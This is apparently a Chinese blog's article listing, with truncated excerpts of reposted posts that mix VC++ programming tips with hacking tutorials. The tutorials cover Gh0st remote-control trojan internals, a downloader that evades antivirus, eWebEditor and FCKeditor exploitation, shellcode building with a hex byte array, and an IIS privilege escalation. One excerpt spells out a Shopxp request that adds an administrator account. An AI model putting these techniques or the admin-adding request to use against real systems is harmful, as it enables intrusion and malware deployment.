- 博客(89)
- 收藏
- 关注
RSS订阅转载 VC实现文本输入框密码的显示与隐藏
void CCMCfgDlg::OnBnClickedCheck1() { // TODO: 在此添加控件通知处理程序代码 int state; state = m_DisplayPassword.GetCheck(); if(BST_CHECKED == state) { m_Password.SetPas
2016-12-01 20:40:07
2012
转载 Gh0st通信协议解析(3)
当顺利的连接到主控端之后,按照程序的一个执行逻辑,被控端会将本机上的一些反映本机状态的一个信息发送到主控端,这个过程其实涉及到了被控端与主控端间信息的交互过程。*******************************************************************************我们需要从sendLoginInfo这个函数讲起。先看看这
2016-07-17 23:39:27
948
转载 gh0st通信协议解析(2)
Gh0st通信协议解析(2)从被控端主动去连接主控端开始谈起。世间万事万物有始有终,宇宙环宇的动力起点就是上帝的那一推之力。当然,主控端与被控端的交互总是从被控端主动连接到主控端开始的,让我们从发起连接这个引爆点谈起……*******************************************************************************
2016-07-17 23:38:39
1581
转载 gh0st通信协议解析(1)
界面篇等我先搞完这个通信协议解析再说,要不我老觉得自己是在扯淡。在这里我也给自己这两天搞的协议解析找个网络存储做一下备份。Gh0st通信协议解析(1)正所谓蛇打七寸,今天我们对gh0st的通信协议进行一个完整的解析,看看gh0st这款远控的核心技术的来龙去脉。**********************************************************
2016-07-17 23:36:14
2269
转载 世界上最远的距离
世界上最远的距离不是生与死的距离而是我站在你的面前你却不知道我爱你世界上最远的距离 不是我站在你的面前你却不知道我爱你而是爱到痴迷却不能说我爱你世界上最远的距离不是我不能说我爱你而是想你痛彻心脾却只能深埋心底世界上最远的距离不是我不能说我想你而是彼此相爱却不能够在一起世界上最远的距离不是彼此相爱却不能在一起
2016-07-14 00:00:16
341
转载 VC 6.0常用控件使用方法介绍
除非特别说明,本文中所用控件变量类型为Control一般控件可用/不可用EnableWindow(TRUE);EnableWindow(FALSE);1、Static Text------------静态控件 --类CStatic 取值/赋值(变量类型为Control)m_lbl.GetWindowText(string);m_lbl.SetWindowText(s
2016-07-13 23:59:23
1395
转载 另类下载者轻松突破瑞星2010主动防御及ESET高启发
随着2010年的临近,各在杀毒软件公司都陆续推出了自己最新的杀毒软件,启发式杀毒以及主动防御被广泛的应用到了新版本的杀毒软件中。下载者由于调用函数单一,生成代码简单,在突破启发式杀毒和主动防御方面有着极大的困难,本文就将给大家介绍一种另类的技术,利用下载者突破当今大部分主流杀毒软件。 作为一个下载者,必须具有两个最核心的功能模块,一个是下载文件,另外一个是执行文件。通常情况下,是通过UR
2016-07-13 23:58:39
874
转载 ewebeditor漏洞利用总结
先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下:1、首先访问默认管理页看是否存在。 默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!)2、默认管理帐号密码! 默认管理页存在!我们就用帐号密码
2016-07-13 23:57:28
3281
转载 Fckeditor漏洞利用方法总结
1.查看编辑器版本FCKeditor/_whatsnew.html——————————————————————————————————————2. Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破!测试通过。——————————————————————————————————————3.Version action=”ht
2016-07-13 23:56:47
5617
转载 常用dos命令
dos命令是每个hacker必学的基础,既然是基础,重要性就不用多说了,网上关于dos命令的文章也很多,我选了几篇修改了一下,再加上自己的一些实例,希望帮助大家学点东西。简单的说下,还是要靠自己多记忆。一,ipconfig /all 显示所有网络适配器(网卡、拨号连接等)的完整TCP/IP配置信息。与不带参数的用法相比,它的信息更全更多,如IP是 否 动态分配、显示网卡的物理地址等。可
2016-07-13 23:55:58
306
转载 FTP命令
FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,么就必须学习FTP指令。FTP的命令行格式为: ftp -v -d -i -n -g [主机名] ,其中-v 显示远程服务器的所有响应信息-n 限制ftp的自动登录,即不使用;.n etrc文件;-d
2016-07-13 23:55:19
454
转载 Gh0st 3.6 存在的BUG及修改方法(收集整理)
以下贴出代码全部为修改后的---------------------------------------------------------------------------------------------------------------------------------1.拖放文件上传和下载时,有选择目标目录的话,可能会使目录重复修改CFile
2016-07-13 23:54:35
3543
转载 c++ 数据类型
类型 定义-------------------------------------------------------------ATOM 原子(字符串在原子表中的参考值)BOOL
2016-07-13 23:53:29
323
转载 vc++ 20个小技巧
一、打开CD-ROMmciSendString("Set cdAudio door open wait",NULL,0,NULL);二、关闭CD_ROMmciSendString("Set cdAudio door closed wait",NULL,0,NULL);三、关闭计算机OSVERSIONINFO OsVersionInfo; //包含操作系统版本信息的数据结构O
2016-07-13 23:52:47
963
转载 自动查找函数地址的程序
//我们可以使用它在每种系统中找出任意想要的DLL和函数的地址,以后要查找其他函数的地址时,把函数名和所在的dll名替换程序的相应地方就可以了。#include #include typedef void (*MYPROC)(LPTSTR);int main(){ HINSTANCE LibHandle; MYPROC ProcAdd; LibHandle =
2016-07-13 23:51:34
817
转载 从汇编代码提取Shellcode的简单实现
#include unsigned char *asm_code(){__asm{ lea eax,__code jmp __ret}//这里放shellcode的汇编代码//------------------------------------------------------------------------------------
2016-07-13 23:50:16
1763
转载 打造Windows下自己的ShellCode
为了帮助初学者了解ShellCode的编写,并能一步一步操作得到自己的ShellCode,因此将Windows下ShellCode的编写过程作详细的介绍,以利于像我一样的菜鸟,最终能够写出简单的但却是真实的ShellCode;而进一步高级的ShellCode的编写,也会在系列后面的文章中一步一步的演示的,希望大家会发现,Exp真好,ShellCode最美妙! ShellCode简介和
2016-07-13 23:49:37
381
转载 简单shellcode
void main(){ char shellcode[] = "\x54\x55\x50\x57\x56\x8b\xec\x33" "\xff\x57\x57\x57\xc6\x45\xf4\x6d" "\xc6\x45\xf5\x73\xc6\x45\xf6\x76" "\xc6\x45\xf7\x63\xc6\x45\xf8\x72" "\xc6\x45\xf9\x74\
2016-07-13 23:48:15
340
转载 Shopxp-v10.85 CRSF攻击远程添加管理漏洞
影响版本:Shopxp-v10.85官方网站:http://www.shopxp.cn漏洞类型:验证错误漏洞描述:savexpadmin.asp添加管理员页未进行身份验证。利用方法:外部提交数据http://127.0.0.1/admin/savexpadmin.asp?action=add&admin2=oceanark&password2=oceanark&Submit2=
2016-07-13 23:45:26
415
转载 Gh0st自动填写上线字符串,源码修改
看到有人在问,那个帖子现在找不到了。今天弄了下,难点还是不同类之间的数据传递,我用到了全局变量和静态函数,解决了这个问题。首先在 CBuildView 类里添加一个静态函数static void fnSetDNS(CString szDNS);添加方法1:打开类视图,在CBuildView类上点右键,添加成员函数方法2:打开BuildView.h文件,在类定
2016-07-13 23:43:47
737
转载 任意分布的随机数的产生方法
摘要: 随机数在实际运用中非常之多,如游戏设计,信号处理,通常我们很容易得到平均分布的随机数。但如何根据平均分布的随机数进而产生其它分布的随机数呢?本文提出了一种基于几何直观面积的方法,以正态分布随机数的产生为例讨论了任意分布的随机数的产生方法。正文:一、平均分布随机数的产生 大家都知道,随机数在各个方面都有很大的作用,在vc的环境下,为我们提供了库函数rand()来产
2016-07-13 23:42:40
4297
1
转载 ShellExecute与ShellExecuteEx的用法
--------------------------------------------------------------------------------如何打开一个应用程序?ShellExecute(this->m_hWnd,"open","calc.exe","","", SW_SHOW );或ShellExecute(this->m_hWnd,"open","not
2016-07-13 23:41:42
535
转载 VC6编译时遇到的一些error LNK2001
error LNK2001: unresolved external symbol解决办法:#pragma comment(lib,"mpr.lib")----------------------------------------------------------------------------------------------------------error LN
2016-07-13 23:40:55
521
转载 开了3389无法登录原因和解决办法
通常通过命令netstat -ano看到3389端口就说明已经开启的远程管理,当然是端口没有修改的情况了.但是经常我们还是会碰到无法连接情况,本文就增对可能遇到的情况进行一些说明,包含问题和解决的思路办法,要根据实际情况灵活应变.1.情况一:服务器处在内网中思路:通过端口反弹到你本机,利用Lcx反弹是最常见的手法,另外如果你有同一个网络的肉鸡那么同样也是可以的.2.情况二:做了IP安全
2016-07-13 23:40:21
4589
转载 内存加载SkinH.dll,不释放文件
美化程序经常要加皮肤,而各种皮肤控件(.dll)总是赤裸裸的强奸我们的视觉神经,非常的让人厌恶。百度了下,发现牛人已经给出代码://------------------------------------------------------------------------------------------------------------------------------
2016-07-13 23:39:25
703
转载 Window路径相关的API
需要头文件:shlwapi.hBOOL PathFileExists(LPCTSTR lpszPath)功能:检查文件/路径是否存在LPTSTR PathFindFileName(LPCTSTR pPath)功能:获得路径中的文件名例如: PathFileFileName( “c:\\Program Files\\File.txt” ) = “File.txt”。如
2016-07-13 23:37:53
235
转载 WMIC命令使用详解
执行“wmic”命令启动WMIC命令行环境。这个命令可以在XP或 .NET Server的标准命令行解释器(cmd.exe)、Telnet会话或“运行”对话框中执行。这些启动方法可以在本地使用,也可以通过.NET Server终端服务会话使用。 第一次执行WMIC命令时,Windows首先要安装WMIC,然后显示出WMIC的命令行提示符。在WMIC命令行提示符上,命令以交互的方式执行。w
2016-07-13 23:37:02
4189
转载 命令行(cmd.exe)中操作注册表
批处理是windows下公认的简化工作甚至自动化的官方语言,批处理是多个命令组合起来相互协作批量处理预定工作,所以学批处理就得先一个个命令学,现在开始学习如何在命令行(cmd.exe)中操作注册表。reg 命令的子命令Reference content 在cmd.exe中键入reg /?查询reg命令的用法和相关帮助,发现它原来还有这么多子命令。如法炮制,需要了解哪一条子命令的
2016-07-13 23:36:21
9807
转载 致命错误 RC1121: RC : fatal error RC1121 : I/O error reading file
关于在directshow的network的例子里面没有做任何修改却出现了一个严重错误的问题解决方法:编译错误提示:C:\DXSDK\Samples\C++\DirectShow\Filters\DSNetwork\Filter\..\sender\propsend.rc(24) : 致命错误 RC1121: RC : fatal error RC1121 : I/O error
2016-07-13 23:34:45
1853
转载 MoveFileEx
函数原型: BOOL MoveFileEx( LPCTSTR lpExistingFileName, // file name LPCTSTR lpNewFileName, // new file name DWORD dwFlags // move options );参数说明: lpExistingFileName,一个存在的文件
2016-07-13 23:33:19
1996
转载 PhotoShop教程:制作玻璃水晶质感文字
最终效果图:现在开始分析制作步骤吧!1、新建文档 600x800px 如图:先选定颜色,把前景色和背景色设置好,如图2、背景效果达到我提供的效果或接近都可以3、接下来,我们要用到笔刷:喷溅笔刷下载地址:http://www.brushking.eu/397/free-hi-res-splatter-p
2016-07-13 23:30:49
1461
转载 error LNK2001: unresolved external symbol _IID_ISampleGrabberCB
DIRECTSHOW编译问题Linking...1> Creating library Release/VideoCap.libandobject Release/VideoCap.exp1>VideoCapCtrl.obj : error LNK2001: unresolvedexternal symbol _IID_ISampleGrabberCB1>VideoCapC
2016-07-13 23:30:03
1814
转载 转换VC工程为UNICODE版的方法
有时候想将一个VC工程转换为UNICODE版本,却不知怎样转换,下面提供一个转换的方法: 1.为了成功编译支持 UNICODE 的 MFC 程序,必须使用 MFC 的 UNICODE 版本库。该库在定制安装Visual C++ 时是个可选安装项。按以下步骤选择:选中Microsoft Visual C++6.0-->Change Option...-->VC++ MFC an
2016-07-13 23:28:56
281
转载 透明ico图标制作方法
icon可以用多个软件制作,也可以通过一些网站把普通图片转换为.ico文件,但通常存在的问题是图片本该透明的地方经转换后变为了黑色或者白色,十分影响效果。难道一定要制作正方形的.ico文件方能掩盖此缺陷?首先,我们得下载个HyperSnap,这里推荐使用的是绿色版本的HyperSnap-DX6, 不用安装,解压使用,此软件的经典用途是用来抓图,多中抓图方式十分强大,同时它又具有很多图片格式
2016-07-13 23:28:01
2322
转载 使用Adsutil.vbs脚本获取IIS配置信息及账号密码
今晚在搞http://gov.com.im/的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这
2016-07-13 23:27:10
664
转载 利用IIS日志追查网站入侵者
前黑站黑了很多,但是就没有想过会不会被追踪到,都没有想过怎么去擦自己的屁股,万万没想到在自己不再黑站的时候,却发现了自己的BBS被黑了。根据当初的判断,BBS程序是我们BCT小组成员编写的Lvbbs不会存在着上传漏洞和SQL注入啊!就算能拿到权限都不可能可以弄出个webshell出来,不是程序的漏洞的话,就一定是服务器的安全问题了,以前整天拿着旁注去黑站,这下子好玩了,竟然被别人拿去黑自己的网站了
2016-07-13 23:26:17
1215
转载 asp.dll解析成system提升权限
网络上传统的提升asp权限为系统的有两种:1.图形化下的,把默认站点—->主目录—>应用程序保护设置为低,这样就可以把asp权限设置为 system.但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天我要谈的关于adsutil.vbs提升权限. 2.用adsutil.vbs搞定.在网络上我看到了很多的教你用这种方法的动画,文章,
2016-07-13 23:25:44
450
转载 Web服务器入侵痕迹检测
web站点默认80为服务端口,关于它的各种安全问题不断的发布出来,这些漏洞中一些甚至允许攻击者获得系统管理员的权限进入站点内部,以下是Zenomorph对一些80端口攻击方式的痕迹的研究,和告诉你怎样从日志记录中发现问题。详细描述下面部分通过一些列子,展示对web服务器和其上的应用程序普遍的攻击,和其留下的痕迹,这些列子仅仅是代表了主要的攻击方式,并没有列出所有的攻击形式,这部分将
2016-07-13 23:24:49
3541
转载 XXOO 传说90黑阔论坛
不说什么了,能射进去的人太多了,我就负责转BY:ahuyangok目标站:www.hacker90.com运气有点好,随便点一个,就那第二个,就日下了,直接命中很简单根据图片找到了eweb的上传,进了后台,发现上传页面被删了,但是我看到了里头又黑阔留下的,加的asa,肯定有人日过,这怎么办呢,直接利用edit 2.8漏洞遍历下Admin_UploadFile.a
2016-07-13 23:23:35
10193
转载 跟刀客一起追寻昨日的足迹
已近年终,城里的白领、乡下的阿姨都开始开始忙年货,在网上有那么一群人也开始忙活起来,为他们的年终奖金而“奋斗”,那就是职业“黑客”,他们窃取数据为自己谋一个温饱或者寻找更大的幸福,乃至奔驰、宝马。在这样的环境下,我管理的服务器收到大量的日志。注入拦截日志,批量扫描拦截日志,敏感文件拦截日志等等呈几何式增长,IIS的日志不断刷新着记录,100m,200m,1G,2G......有些网站仅日志一项都拿
2016-07-13 23:22:05
452
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人